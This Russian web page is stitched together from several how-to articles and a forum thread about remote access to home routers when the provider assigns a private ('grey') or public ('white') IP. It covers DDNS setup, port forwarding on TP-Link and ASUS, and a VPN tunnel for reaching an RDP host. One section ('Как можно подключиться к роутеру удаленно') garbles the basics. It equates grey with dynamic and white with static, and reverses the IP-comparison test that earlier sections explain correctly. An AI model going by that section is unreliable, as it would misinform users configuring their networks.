Серый айпи как исправить

Настройка удаленного подключения к роутеру через интернет Сперва потребуется выполнить авторизацию в веб-интерфейсе маршрутизатора, используя для этого

Настройка удаленного подключения к роутеру через интернет

Как удаленно подключиться к роутеру через интернет

Сперва потребуется выполнить авторизацию в веб-интерфейсе маршрутизатора, используя для этого подключенный к нему компьютер или ноутбук. Все следующие инструкции будут разобраны на примере TP-Link, поэтому и о принципе входа в интернет-центр рекомендуем прочитать в другой статье на нашем сайте, где за основу взята соответствующая модель роутера.

Авторизация в веб-интерфейсе роутера для дальнейшей настройки удаленного доступа

Второй этап подготовительных действий — определение метода получения IP-адреса, а также его сравнение на специальном сайте. Это необходимо сделать для того, чтобы выбрать дальнейший способ настройки удаленного подключения и вообще понять, можно ли это реализовать при текущих параметрах. Просмотр нужной информации осуществляется во всех веб-интерфейсах роутеров одинаково. Откройте раздел «Состояние» или «Мониторинг», где отыщите раздел «WAN» и обратите внимание на строку «IP-адрес». Здесь же вы можете узнать, статический он или динамический.

Определение IP-адреса роутера для дальнейшей настройки удаленного доступа

Теперь понадобится определить, белый ли IP-адрес, то есть в интернете он должен быть таким же, как и отображается в веб-интерфейсе. Для этого проще всего использовать специальный сайт для определения IP-адреса, перейти к которому можно по ссылке ниже. Если адрес соответствует определенному через интернет-центр, значит, он белый.

Проверка IP-адреса роутера для дальнейшей настройки удаленного доступа

Отталкиваясь от полученной информации, можно понять, чем стоит заняться в дальнейшем, какой метод организации удаленного доступа выбрать и реально ли его вообще настроить. Существует три варианта развития событий:

  • Серый IP. Если при сравнении IP-адресов оказалось, что в веб-интерфейсе написано одно значение, а сайт видит совершенно другое, при этом VPN на компьютере не включена, значит, провайдер предоставляет серый IP. Использовать его для удаленного подключения не получится — остается только обратиться напрямую к поставщику интернет-услуг и заказать у него переподключение на статический IP-адрес, если компания предоставляет такую услугу.
  • Белый статический IP. Если в ходе проверки оказалось, что адрес статический, это означает, что следует выбрать первый метод настройки удаленного подключения, используя для этого функцию «Удаленное управление» в веб-интерфейсе маршрутизатора.
  • Белый динамический IP. Динамический IP-адрес время от времени меняется, поэтому настройки, заданные в веб-обозревателе, могут в любой момент сбиться, из-за чего пропадет удаленный доступ. Конечно, ничего не мешает воспользоваться первым методом, чтобы временно предоставить возможность подключение, но проще будет задействовать услугу «Динамический DNS», о чем пойдет речь во втором способе.

Внимательно ознакомьтесь с представленной информацией, чтобы подобрать подходящий вариант, а затем переходите к его реализации, следуя инструкциям ниже.

Способ 1: Функция «Удаленное управление»

Практически во всех прошивках любого маршрутизатора есть функция «Удаленное управление», которая по умолчанию отключена. Она открыта для настройки и позволяет наладить доступ всем целям или только конкретному компьютеру для удаленного управления, а выполняется такое конфигурирование следующим образом:

    После авторизации в интернет-центре откройте раздел «Защита» и отыщите там «Удаленное управление». Расположение меню может отличаться в зависимости от типа веб-интерфейса. Иногда, например, требуется открыть меню «Система» и там уже отыскать требуемый пункт.

Переход в меню Удаленное управление для настройки удаленного доступа роутером

Ввод параметров для настройки удаленного доступа к роутеру

Переход в меню Пароль для изменения данных для авторизации в роутере при настройке удаленного доступа

Изменение данных для авторизации в роутере при настройке удаленного доступа

Переход по адресу роутера для проверки удаленного доступа

Дополнительно отметим, что при выборе конкретной цели для предоставления удаленного управления потребуется указать ее точный IP-адрес. Для его определения можно воспользоваться веб-интерфейсом маршрутизатора так, как это было показано выше, или инструкцией в других статьях на нашем сайте.

Способ 2: Подключение динамического DNS

Функция динамического DNS часто распространяется платно, но сейчас появляется все больше сервисов, предоставляющих пробные периоды, а также бесплатные версии. Суть такого DNS заключается в присвоении роутеру буквенного адреса, который заменяет стандартный IP. Подойдет это в тех ситуациях, когда организация удаленного доступа невозможна из-за постоянной смены адреса роутера. Выполняется подключение динамического DNS в четыре простых шага.

Шаг 1: Выбор сервиса

Начать следует именно с выбора сервиса, чтобы подыскать бесплатный или дешевый вариант. Часто в веб-интерфейс маршрутизатора уже встраивается несколько совместимых вариантов, поэтому лучше будет задействовать их, но ничего не помешает найти в интернете и сайт, предоставляющий такие услуги.

    В интернет-центре откройте раздел «Динамический DNS».

Переход к настройке DDNS для организации удаленного доступа к роутеру

Выбор сайта для настройки DDNS при организации удаленного доступа к роутеру

Просмотрите описание и цены на каждом сайте, чтобы найти подходящий тарифный план. В TP-Link и некоторых других маршрутизаторах доступен noip. Это оптимальное решение для тех, кто хочет бесплатно проверить технологию. На примере этого сервиса и будет разобран следующий шаг.

Шаг 2: Регистрация динамического DNS

Интерфейс сайтов различается, поэтому нельзя создать универсальное руководство, позволяющее разобраться с каждым из них. Однако практически везде принцип взаимодействия одинаков, поэтому остановимся на noip, а вам останется лишь взять следующие действия за пример.

    После перехода на главную страницу сайта создайте свой домен, написав его адрес латиницей. Учтите, что сам адрес должен быть уникальным.

Регистрация DDNS для организации удаленного доступа к роутеру

Регистрация на сайте для добавления DDNS при организации удаленного доступа к роутеру

Подтверждение регистрации аккаунта на сайте для предоставления DDNS

Подтверждение профиля на сайте для предоставления DDNS роутеру

Переход к взаимодействию с сайтом для предоставления DDNS роутеру

Проверка адреса для предоставления DDNS роутеру

Шаг 3: Настройка DDNS в веб-интерфейсе

Перед соединением остается только настроить динамический DNS через интернет-центр маршрутизатора. Для этого перейдите в то же самое меню, выберите поставщика услуг, вставьте полученное доменное имя, введите логин и пароль, используемые на сайте. Активируйте пункт «Включить DDNS» и выполните вход.

Авторизация DDNS в веб-интерфейсе роутера для организации удаленного доступа

Убедитесь, что состояние подключения находится в статусе «Успешно». Только после этого можно переходить к проверке удаленного управления.

Успешная авторизация DDNS в веб-интерфейсе роутера для предоставления удаленного доступа

Если выполнить вход не удалось, проверьте правильность ввода личных данных от аккаунта на сайте или подождите несколько минут для обновления информации по доменам, а после повторите авторизацию. Дополнительно всегда можно обратиться в поддержку на сервисе, чтобы получить профессиональную помощь.

Шаг 4: Получение удаленного доступа

Распространите динамический DNS-адрес между всеми пользователями, кому хотите предоставить удаленное управление роутером. Они должны будут ввести его в адресной строке браузера и перейти. Для авторизации в веб-интерфейсе потребуется указать логин и пароль, а об изменении учетных данных мы говорили при разборе Способа 1.

Переход по доменному имени роутера после настройки удаленного доступа

Уточним, что в этой статье мы не разобрали опцию «Облако TP-Link», поскольку ее поддерживает всего несколько дорогостоящих моделей роутеров от данного производителя, а другие компании пока не практикуют добавление подобных функций. Если же вы являетесь обладателем устройства, в котором есть такой инструмент, перейдите к нему через веб-интерфейс и ознакомьтесь с детальными инструкциями от разработчиков, чтобы разобраться в подключении.

ЗакрытьМы рады, что смогли помочь Вам в решении проблемы.

DDNS (динамический DNS) на роутере: что это, как работает и как пользоваться?

В этой статье я постараюсь простыми словами пояснить, что такое функция динамической системы доменных имен (DDNS) и для каких задач она используется. Чтобы подготовить максимально простую статью, я все проверил на своем оборудовании. Постарался изучить все нюансы и возможные проблемы, с которыми можно столкнуться в процессе настройки.

Ниже речь пойдет об использовании DDNS именно на роутерах. Практически в каждом современно роутере есть поддержка функции динамической системы доменных имен, что дает возможность зарегистрировать для роутера бесплатный, статический адрес. Используя этот адрес, вы откуда угодно сможете зайти на свой роутер (в его веб-интерфейс) , или получить доступ к настроенному на роутере (или за ним) серверу, веб-камере, сетевому накопителю и т. д.

Что такое DDNS?

Функция «Динамический DNS» (Dynamic DNS) позволяет присвоить постоянное доменное имя (адрес для доступа из интернета) публичному, динамическому IP-адресу, который роутер получает от провайдера. Это нужно в первую очередь для доступа к настройкам роутера через интернет (когда вы не подключены к домашней сети) . Так же с помощью DDNS можно настроить доступ через интернет к FTP-серверу, который настроен на роутере. Есть разные сценарии использования функции DDNS (веб-сервер, игровой сервер, доступ к сетевому накопителю NAS, IP-камере) . Но удаленный доступ к FTP-серверу и к настройкам маршрутизатора – это самые популярные варианты. В моем случае, после настройки отлично работало и то, и другое. Некоторые производители дают возможность получать удаленный доступ к настройкам роутера через облако (используя приложение на мобильном устройстве) . Это намного проще и удобнее. Но такая функция есть далеко не на всех маршрутизаторах.

Для начала хочу пояснить, как работает DDNS. Каждый роутер, который подключен к интернету, получает от провайдера внешний IP-адрес. По этому адресу можно получить доступ к роутеру через интернет (или к серверу, который настроен на устройстве за роутером) . Даже когда мы подключены к интернету через другой роутер, мобильный интернет и т. д., и не находимся в своей локальной сети. Но проблема в том, что провайдер чаще всего выдает динамический IP-адрес, а не статический.

Динамический, внешний IP-адрес, который провайдер выдает роутеру, может постоянно меняться (провайдер каждый раз выдает роутеру новый адрес) . И уже после изменения адреса мы не сможем получить доступ к роутеру через интернет. Здесь нам пригодится DDNS. Как я уже писал в начале статьи, с помощью этой функции можно получить постоянный адрес для доступ к нашему роутеру, даже если провайдер выдает динамический IP-адрес, который постоянно меняется.

Выводы: если провайдер выдает внешний статический IP-адрес (чаще всего нужно отдельно подключать эту услугу) – заморачиваться с настройкой функции «Динамический DNS» не нужно, в этом не смысла, так как у вас уже есть постоянный адрес. Если же у вас динамический внешний IP – настройка DDNS решит эту проблему. Так как после настройки мы получим статический адрес.

Не все так просто: «серые» IP-адреса и DDNS

Сейчас я коротко расскажу, что такое серые и белые внешние IP-адреса, и вы все поймете. Для выхода в интернет провайдер присваивает роутеру, или конкретному устройству внешний (публичный) IP-адрес. Белый, публичный IP-адрес (даже если он динамический) позволяет получить доступ к нашему роутеру из интернета. То есть, этот адрес обеспечивает прямую связь из сети интернет и маршрутизатором.

Так как белых IP-адресов на все устройства в сети интернет не хватает (возможно, это не основная причина) , то интернет-провайдеры очень часто выдают своим клиента (роутерам, устройствам) серые IP-адреса (они же приватные, или частные) . Это адреса из локальной (частной) сети интернет-провайдера. А уже из локальной сети провайдера идет выход в интернет через один внешний IP-адрес. Он может быть общим для определенного количества клиентов.

Мы сейчас не будем обсуждать, плохо это, или хорошо. Но дело в том, что функция DDNS через серый IP-адрес работать не будет . Чтобы настроить динамический DNS, необходимо, чтобы провайдер выдавал вам белый, публичный IP-адрес.

Некоторые маршрутизаторы могут сами определять, какой IP-адрес выдает провайдер. Приватный (серый) , или публичный (белый) . Так, например, на роутерах ASUS, если адрес серый, то в разделе с настройками DDNS отображается следующее предупреждение: «Беспроводной роутер использует приватный WAN IP адрес. Этот роутер находится в NAT окружении и служба DDNS работать не может».

DDNS на роутере не работает через серые (частные) IP-адреса

Если ваш маршрутизатор не умеет определять это автоматически, то есть другой способ выяснить.

Как проверить, «белый» или «серый» IP-адрес выдает провайдер?

Нужно для начала зайти в настройки своего Wi-Fi роутера, и прямо на главной странице (обычно, это»Карта сети», или «Состояние») , или в разделе WAN (Интернет) посмотреть WAN IP-адрес, который присвоен роутеру интернет-провайдером. Вот, например, на роутере TP-Link:

Определяем, "белый" или "серый" IP-адрес

Дальше нам нужно зайти на любой сайт, на котором можно посмотреть свой внешний IP-адрес. Например, на https://2ip.ru/

"белый" и "серый" IP-адрес при настройке DDNS

Важно! Убедитесь, что на устройстве, в браузере не включен VPN. Иначе, на сайте будет отображаться не ваш реальный IP-адрес, а адрес VPN-сервера. Используйте стандартный браузер.

Если WAN IP-адрес в настройках роутера и на сайте отличатся, значит провайдер выдает вам серый IP-адрес. А если они совпадают – то белый. В моем случае адреса разные, значит у меня серый IP-адрес и DDNS настроить не получится.

В этом случае (если адрес серый) можно позвонить в поддержку интернет-провайдера, и сказать, что вам нужен белый внешний IP-адрес. Скорее всего они сделают вид, что не понимают о чем идет речь, и начнут рассказывать вам о статических и динамических адресах. Мол это одно и то же, подключите статический IP у нас и все заработает. Да, статический IP будет белым, но как правило, это платная услуга. Да и как мы уже выяснили выше в статье, настраивать DDNS тогда уже не нужно.

Как работает динамический DNS на роутере?

На роутерах разных производителей, даже на разных прошивках, настройка Dynamic DNS может отличаться. Но, так как принцип работы одинаковый, то и схема настройки на всех устройствах будет примерно одинаковой. В рамках этой статьи невозможно подробно показать, как выполнить настройку на разных маршрутизатора (это я буду делать в отдельных статьях) , но как это примерно работает, мы сейчас посмотрим.

  1. Нужно зайти в настройки роутера и найти раздел с настройками «DDNS». Он может называться еще «Динамический DNS». Там должен быть список сервисов, которые предоставляют услугу динамического DNS. Некоторые из них платные, некоторые с бесплатным пробным периодом, а некоторые предоставляют DDNS бесплатно (с определенными ограничениями, но нам будет достаточно бесплотной версии) . Самые популярные: dyn.com/dns/, no-ip.com, comexe.cn.
    DDNS на роутереСкорее всего, там сразу будет ссылка на регистрацию в выбранном сервисе, который предоставляет динамические DNS.
    Многие производители сетевого оборудования предоставляют свои сервисы DDNS. Например, у ASUS это WWW.ASUS.COM (в списке сервисов на роутере) , на устройствах от Keenetic – KeenDNS (с поддержкой облачного доступа, который работает с серыми IP-адресами) . У TP-Link есть сервис TP-Link ID. Но, как я понимаю, он пока что доступен не на всех роутерах и работает только через облако. Если роутер предоставляет свой сервис динамичных доменных имен, то лучше выбрать его.
  2. Нужно зарегистрироваться в выбранном сервисе и получить там уникальный адрес. В настройках роутера нужно указать этот адрес, и скорее всего еще логин и пароль, который вы установили при регистрации в выбранном сервисе.
    Настройка динамических DNS (DDNS) на роутереЕсли подключение с сервисом будет установлено (смотрите состояние подключения) , то можно сохранять настройки.
  3. После того, как мы получили уникальный адрес и задали все настройки в роутере (и он установил подключение к сервису) можно использовать этот адрес для доступа к самому роутеру через интернет.
    Удаленный доступ к настройкам роутера через DDNS
    Или к FTP-серверу, например (набрав адрес через ftp://) . В случае с FTP, к вашему роутеру должен быть подключен накопитель, настроен FTP-сервер и включен «доступ к Интернет».
    Как работает доступ к FTP-серверу через DDNSЧтобы заходить через этот адрес в настройки роутера, скорее всего придется в настройках разрешить удаленный доступ для всех адресов.

Безопасность при использовании Dynamic DNS

Так как наш роутер имеет уникальный, постоянный адрес (пусть даже не известный для всех) , через который можно получить к нему доступ, то обязательно нужно подумать о безопасности. Чтобы закрыть для посторонних доступ к самому маршрутизатору, FTP-серверу, камерам и другим серверам и устройствам, которые подключены/настроены на роутере.

В первую очередь нужно установить надежный пароль администратора роутера. Об этом я писал в статье как на роутере поменять пароль с admin на другой. Если там есть возможность сменить имя пользователя – смените. Даже если кто-то узнает адрес вашего роутера и перейдет по нему, то не зная логина и пароля, он не сможет получить доступ к настройкам.

Если настроен FTP-сервер, общий доступ к файлам – обязательно нужно сменить имя пользователя и пароль установленного по умолчанию пользователя admin (он запрашивается при доступе к FTP-серверу) . Если создаете новых пользователей, то устанавливайте для них надежные пароли.

К маршрутизатору подключена IP-камера, сетевое хранилище NAS? Они также должны быть защищены хорошим паролем. Стандартное имя пользователя (admin) я так же рекомендую сменить. Сделать это можно в настройках этих устройств.

Если вы, например, планируете использовать адрес DDNS только для доступа к FTP-серверу, а доступ к панели управления роутером вам не нужен, то убедитесь, что удаленный доступ отключен в настройках роутера.

Выводы

Функцию DDNS можно настроить только на том роутере, который получает от провайдера внешний, белый, динамический IP-адрес. Если роутер получает статический внешний (WAN) IP-адрес, то в этой функции нет никакого смысла.

Если провайдер не может, или не хочет выдавать вам белый WAN IP-адрес, а вы не хотите, или нет возможности подключить услугу «Статические IP-адрес», то изучите информацию по своему роутеру. Возможно, там есть способ получать доступ к настройкам через облако. Но вот доступ файлам, IP-камере, NAS, через облако скорее всего не настроить.

Как можно подключиться к роутеру удаленно через Интернет

Роутер1

Порой можно заметить чрезмерное использование трафика. В чем причина, ведь переплачивать за Интернет никто не хочет. Возможно, это подключились недобросовестные соседи, но как проверить это предположение? Для решения проблемы необходимо получить удаленный доступ к роутеру. Сделать это можно самостоятельно через Интернет. Данная функция позволит не только управлять подключенными устройствами, но и сменить пароль, внести изменения в настройки, а при необходимости перезагрузить устройство.

Подключение к роутеру TP-Link

Для примера, разберем получение удаленного доступа к роутеру TP-Link. Само собой разумеется, что перед подключением нам понадобятся некоторые данные об устройстве. Как правило, их можно найти на обратной стороне прибора.

Данные для входа

Этикетка может выглядеть следующим образом, как показано на рисунке ниже.

Подключение домашнего роутера удаленно через Интернет происходит через внешний IP-адрес или по-другому — DDNS. Однако, далеко не все устройства могут поддерживать удаленный доступ, но обо всем по порядку.

Перед настройкой первым делом необходимо узнать, какой IP-адрес выдает роутеру ваш интернет-провайдер.

Всего их может быть два вида:

  • серый — динамический;
  • белый — статический.

Как узнать цвет IP-адреса

В настройках роутера необходимо посмотреть WAN IP-адрес и сравнить с данными на специальном бесплатном сайте «2ip.ru». Если он не сходится, то устройство имеет белый адрес, и наоборот — совпадение цифр означает динамический сервер.

Если прибор имеет «белый» IP-адрес, то установить удаленное управление роутером можно, настроив DDNS. Владельцам статического WAN IP-адреса повезло меньше — самому удаленный доступ на данном типе роутера настроить невозможно. Но можно обратиться к своему провайдеру и заказать специальную услугу под названием «статический IP-адрес», однако, как правило, она всегда платная.

Как зайти в настройки

Для удаленного подключения необходимо зайти в настройки. Для этого требуется выполнить последовательность действий:

  1. Подключиться к роутеру по сети Wi-Fi. Данную операцию можно при необходимости произвести через браузер мобильного телефона, но удобнее всего использовать ноутбук или компьютер.
  2. Далее в поисковой строке вбиваем один из двух адресов: «192.168.1.1» или «192.168.0.1». Адрес для входа в настройки указан на этикетке снизу роутера.
  3. Далее высветится маленькая табличка с требованием ввести имя пользователя и пароль. В заводских моделях, как правило, требуется ввести в оба поля слово «admin». Если вы их ранее меняли, то указывать необходимо свои.

Если все сделано правильно, то откроется меню настроек роутера.

Далее следует определиться, с какого IP-адреса необходимо наладить удаленное подключение: с постоянного или с любого. Второй вариант более универсальный, так как позволяет подключиться с любого устройства в любое время.

Подключение с любого IP-адреса

Когда вошли в меню настроек роутера, следует приступать уже к самому подключению. Для этого необходимо выполнить следующие действия:

Настройка правила ТА

  1. Находим раздел «Безопасность», кликаем по нему.
  2. Переходим в раздел «Трансляция сетевых адресов (NAT)». Выглядеть его содержимое будет примерно следующим образом, как показано на рисунке ниже.
  3. Далее необходимо заполнить таблицу по данному образцу:
  • В разделе «Интерфейс» требуется выбрать один из предложенных вариантов подключения: «ISP», «PPPoE», «L2TP» или «PPTP». Можно выбрать на свое усмотрение, но порой необходимый вариант уже указан в договоре с провайдером.
  • Пункты «Пакеты на адрес» и «Маска» пропускаем, в них ничего указывать не требуется.
  • Далее следует пункт «Протокол». Тут выбираем стандартный «TCP/80 — Передача страниц WWW (HTTP)». Также следует заметить, что расширение всегда будет «HTTP».
  • «Номер порта» тоже пропускаем.
  • Предпоследний пункт — «Перенаправить на адрес». В нем пишем IP-адрес. Обычно он у всех роутеров идентичен — «192.168.1.1», но если он уже был изменен, то пишем измененный.
  • Последним идет «Новый номер порта назначения». Ставим цифру 80.
  • После того, как все готово, нажимаем «Сохранить».
  • Перезагружаем устройство и пробуем подключиться с нового девайса. Для этого достаточно зайти на сайт 2ip.ru и записать статический адрес.

Подключение с определенного IP-адреса

Такой метод подойдет, когда точно знаете с какого компьютера, телефона или планшета, будет осуществляться постоянный контроль. Например, это может быть рабочий компьютер.

Для подключения необходимо запомнить IP-адрес рабочего компьютера. Узнать его можно при помощи специальной утилиты «ipconfig», которая является стандартным инструментом системного администратора в операционных системах Windows.

Дальнейшая работа выполняется уже на домашнем компьютере:

Настройка правила

  1. Находим раздел «Безопасность», нажимаем на него.
  2. Попадаем в подраздел «Межсетевой экран».
  3. Там можно увидеть следующую таблицу:
  • Первой идет строка «Действие». В ней выбираем «Разрешить».
  • В разделе «IP-адрес источника» ставим значение «один», а далее пишем уже известный нам IP, который взяли на рабочем компьютере.
  • В поле «Протокол» ставим «TCP/80 — Передача страниц WWW (HTTP)».
  • Работа сделана, осталось только нажать «Сохранить».
  • Перезагрузить роутер и проверить работу, зайдя через рабочий компьютер.

Подключение к ASUS

Роутер2

Подключение к устройствам данной фирмы почти ничем не отличается от остальных.

Чтобы установить удаленное подключение, необходимо выполнить следующие действия:

  1. Зайти в настройки.
  2. Выбрать раздел «Internet Firewall».
  3. Автоматически перейдете в подраздел «Basic Config».
  4. Дать доступ в разделе «Enable Web Access from WAN» и подтвердить, нажав «Apply».
  5. Посмотреть свой IP. Для этого необходимо перейти в меню «Status and Log», в раздел «System Log».
  6. Чтобы получить доступ к настройкам из Интернета, используем WAN.

Заключение

Удаленное подключение к роутеру процесс простой и не занимающий много времени. Выполняя все по схеме, можно быстро и без труда самостоятельно установить соединение и подключаться к роутеру в любое время.

0 / 0 / 0

Регистрация: 23.07.2018

Сообщений: 9

1

23.07.2018, 08:55. Показов 15423. Ответов 5


Добрый день. Ситуация следующая. Компьютер подключен к инету через роутер, а не напрямую. Провайдер выдает серый IP из диапазона от 100.64.0.0 до 100.127.255.255, комп находится за NAT, не работает проброс портов. Так как No-Ip и тому подобные сервисы не работают в этом случае, IPv6 туннельные брокеры, Teredo тоже не решение соединение ужасное.

Есть в доступе ещё 1 пк с белым IP, собственно можно как то настроить между ними канал, чтобы первый компьютер прогонял свой трафик через пк с белым IP? Win 7 и Win XP. Я просто нубоват в этой теме.

__________________
Помощь в написании контрольных, курсовых и дипломных работ, диссертаций здесь



0



Эксперт .NET

9028 / 5672 / 1352

Регистрация: 25.05.2015

Сообщений: 17,229

Записей в блоге: 14

23.07.2018, 09:03

2

Вам-то белый IP c какой именно целью нужен?



0



Эксперт по компьютерным сетям

4613 / 2009 / 426

Регистрация: 17.10.2015

Сообщений: 8,665

23.07.2018, 09:12

3

Цитата
Сообщение от helgiheim
Посмотреть сообщение

Есть в доступе ещё 1 пк с белым IP

1) он как подключен? через роутер или напрямую?
2) адрес точно белый?

Цитата
Сообщение от helgiheim
Посмотреть сообщение

можно как то настроить между ними канал

да, можно

Цитата
Сообщение от helgiheim
Посмотреть сообщение

чтобы первый компьютер прогонял свой трафик через пк с белым IP

ну не прям дословно так…траф будет проходить на том устройстве, где поднят ISP

Предположим, на роутере2 белый адрес (85.111.32.229) Роутер может работать с VPN и имеет в своем функционале VPN-сервер. В соответствии с инструкцией настраиваем данный VPN-сервер.
На твоем роутере1 (с серым адресом) должен быть VPN-клиент (иначе придется подключение к тырнету поднимать на самом ПК), настраиваем подключение к ранее настроенному VPN-серверу.
После того, как туннель поднялся, настраиваем маршрутизацию между сетями (если таковое требуется) и прописываем необходимый порт-форвадинг на роутере2.
Пример:
— сеть роутера1 — 192.168.0.0/24, роутер1 — 192.168.0.1, ПК с RDP — 192.168.0.200 порт стандартный
— сеть роутера2 — 192.168.1.0/24, роутер2 -192.168.1.1
— VPN-сервер (РРТР) 10.10.10.1, VPN-клиент 10.10.10.2
Прописать проброс порта 3389 на роутере2, по тунелю до ПК 192.168.0.200 (данный процесс довольно сложный, все зависит от того оборудования которое используется, ну и от самого себя — как хорошо умеешь гуглить)
Из вне, для доступа по RDP пишем адрес роутера2: 85.111.32.229, а попадаем на ПК за роутером1



0



0 / 0 / 0

Регистрация: 23.07.2018

Сообщений: 9

23.07.2018, 09:34

 [ТС]

4

Ток какахами не бросаться плз. Для игрушки Stationeers (не реклама) стимовской, для людей любящих всякие инженерные штуки. У них официальных серверов своих нету.Игра автоматом расшаривает UPnP и пробрасывает порты, но имея серый IP никто к твоему серверу подключиться само собой не сможет.

А понимаю можно арендовать хостинг или купить выделенный IP, кстати ростелеком адовый крохобор ( тариф 550 р в месяц а за статику просит 180 дичь) и не парить мозги, но как человек вроде не глупый и тянущийся к знаниям легких путей не ищу да и просто интересно это, хостинг итак куплю.

1) он как подключен? через роутер или напрямую?
2) адрес точно белый?

Тоже через роутер, адрес точно белый, динамика правда но белый.

А поднять VPN сервер прямо на втором пк те трогая роутер2 никак?



0



Эксперт по компьютерным сетям

4613 / 2009 / 426

Регистрация: 17.10.2015

Сообщений: 8,665

23.07.2018, 10:07

5

Цитата
Сообщение от helgiheim
Посмотреть сообщение

А поднять VPN сервер прямо на втором пк те трогая роутер2 никак?

можно, но тогда:
1) ПК2 должен постоянно включен быть
2) будет некоторая нагрузки присутствовать
3) Прописывать статическую иаршрутизацию придется на ПК
4) придется пробрасывать порты для VPN-сервера на роутере2



0



0 / 0 / 0

Регистрация: 23.07.2018

Сообщений: 9

23.07.2018, 10:21

 [ТС]

6

Хорошо, спасибо буду пробовать.



0



Адрес интернет-протокола, или IP-адрес – это уникальный адрес в сети, назначаемый каждому сетевому устройству. Сетевые устройства используют IP-адреса для связи друг с другом. Подобно тому, как почтовый адрес определяет, куда необходимо доставить письмо, IP-адрес идентифицирует компьютеры в сети Интернет.

  1. 1 Серый и белый IP – что это такое?
  2. 2 Зачем нужен белый IP-адрес пользователю?
  3. 3 Как узнать, какой IP-адрес у пользователя
    1. 3.1 Прямое подключение ПК
    2. 3.2 Подключение через роутер
  4. 4 Как сделать или получить белый IP у провайдера?
    1. 4.1 Видео — Белый и серый IP адреса

IP-адрес – это набор из 4-х чисел от 0 до 255, прерываемых точками, к примеру, 192.168.1.101. Помимо других своих характеристик, адреса IP бывают «белыми» или «серыми».

Белый IP

Белый IP

Серый и белый IP – что это такое?

Белый (public, публичный, внешний) IP-адрес назначается сетевому устройству для обеспечения прямого доступа по всей сети Интернет. Белые IP часто принадлежат веб-серверам, почтовым серверам и любым серверным устройствам, доступным напрямую из глобальной сети.

Справка! Белые IP-адреса глобально уникальны и назначаются уполномоченными организациями (напр., провайдером Интернет) только на уникальные устройства.

Серый (private, частный, внутренний) IP-адрес – это адрес, входящий в адресное пространство, специально выделенное для организации частными лицами внутренних (локальных) сетей. Любым устройствам, подключаемым во внутреннюю сеть – ПК, смартфонам, сетевым принтерам, назначается серый IP.

Белый IP

Схема работы внутреннего (серого) и внешнего (белого) IP-адресов

Диапазон IP-адресов, выделенный для сетей этого типа.

Белый IP

Диапазон приватных IP-адресов

Для выхода в Интернет из частных сетей применяются устройства с белым IP:

  • маршрутизаторы, транслирующие (заменяющие) локальные IP-адреса с помощью механизма NAT;
  • серверы-посредники SMTP, прокси-серверы и т.д., обменивающиеся с «серыми IP» через протоколы POP3, HTTP;
  • серверы PPPoE, VPN и т.д., создающие сетевой туннель, «заворачивая» пакеты сетевого уровня, к примеру, в пакеты транспортного.

Разделение между белыми и серыми IP введено для экономии количества используемых в Интернет IP-адресов. Ранее количество пользователей в сети было небольшим и белых IP-адресов хватало на всех.

Однако, число свободных адресов современного протокола IPv4 (IP версии 4), составляет максимально 4,22 млрд. шт., и на сегодняшний день считается практически исчерпанным. Исправить ситуацию призваны технологии NAT и VPN, позволяющие выходить в Интернет с помощью серого IP.

Белый IP

Технология NAT позволяющая выходить в Интернет с помощью серого IP

Зачем нужен белый IP-адрес пользователю?

Так как белый IP – это прямой и общедоступный адрес сети Интернет, проще показать, какие минусы имеются у серого IP, сделав выводы о нужности или ненужности белого IP для подключения к глобальной сети.

Поскольку выход в Интернет часто осуществляется множеством пользователей через один адрес IPv4, все выходящие в глобальную сеть зависят от этого IP.

В результате может сложиться ситуация, когда на каком-либо ресурсе одного из пользователей с серым IP «забанили» по его IP-адресу. Из-за этого все остальные пользователи, выходящие в Интернет через этот же IP, попадают под действие санкций, наложенные на пользователя на этом ресурсе.

Белый IP

Серый IP-адрес может быть забанен из-за присвоения его многим пользователям

Проблема также касается и сервисов обмена файлами, к примеру, Turbobit, DepositFiles и т.д. При установленном ограничении на скачивание по IP-адресу пользователи могут получать сообщение, что идет скачивание файлов или получать сообщение о превышении лимита скачиваний, если один из пользователей уже превысит этот лимит.

Белый IP

На серый IP-адрес могут быть ограничения в скачивании файлов из сети

Еще одна проблема серого IP – невозможность прямого подключения к серверу в Интернете, т.к. клиент с серым IP не может предоставить внешнего соединения. Это касается программ, где сервер устанавливает синхронное соединение, идентифицируя клиента по IP и запрашивая открытие портов – онлайн-игр, программ Remote Administrator, Emule, активной передачи файлов по ICQ, передачи видео с IP-видеокамер и т.д.

Белый IP

Взаимодействие клиентов и серверов

Существуют способы обхода этой ситуации, в частности, с помощью VPN-сервисов Интернет, настроив PPTP или L2TP-соединение, но это может работать не всегда и требует от пользователя определенных знаний.

Третья проблема – возможное снижение скорости соединения с Интернетом при большом количестве пользователей, выходящих через один IP-адрес.

Единственным плюсом подключения серого IP можно считать его более высокую безопасность, т.к. к такому пользователю сложно подключиться извне, при этом порты его персонального компьютера закрыты.

Как узнать, какой IP-адрес у пользователя

Чтобы узнать тип своего IP-адреса, необходимо выяснить его в сети провайдера. Способ выяснения различается в случае прямого подключения компьютера кабелем или подключения ПК через роутер (маршрутизатор).

Прямое подключение ПК

Шаг 1. Щелкнуть правой кнопкой мыши по пиктограмме сети в области уведомлений (внизу справа) и выбрать «Центр управления сетями…».

Белый IP

Щелкаем правой кнопкой мыши по пиктограмме сети в области уведомлений, выбираем «Центр управления сетями…»

Шаг 2. Щелкнуть по ссылке «Подключение по локальной сети».

Белый IP

Щелкаем по ссылке «Подключение по локальной сети»

Шаг 3. В «Состояние…» щелкнуть «Сведения…».

Белый IP

Кликаем по кнопке «Сведения»

Шаг 4. В «Адрес IPv4» будет указан IP-адрес подключения к Интернет.

Белый IP

В поле «Адрес IPv4» будет указан IP-адрес подключения к Интернет

Сверить этот IP-адрес с приведенным выше диапазоном IP-адресов, выделенным для локальных сетей. Если цифры IP-адреса попадают в указанный диапазон, то этот адрес является серым, если нет, то белым.

Подключение через роутер

Как уже упоминалось, все сетевые устройства подключаются к роутеру через серые IP. Поэтому, если в сети имеется роутер с выходом в Интернет, необходимо выяснять IP-адрес на самом роутере. Для этого нужно зайти в его настройки.

Шаг 1. Выяснить IP-адрес, username (имя пользователя) и password (пароль) конкретной модели роутера в его документации, на этикетке внизу устройства или в Интернет. Если эти данные были изменены, вспомнить их или найти о них записи.

Белый IP

На этикетке внизу роутера находим данные для входа в настройки из браузера

Шаг 2. Открыть Интернет-браузер и набрать IP роутера в строке адресов, нажав «Enter».

Белый IP

Открываем Интернет-браузер, набираем IP роутера в строке адресов, нажав «Enter»

Шаг 3. В меню входа набрать «Имя» и «Пароль». Нажать «Вход».

Белый IP

Набираем в полях «Имя» и «Пароль», нажимаем «Вход»

Откроются настройки роутера.

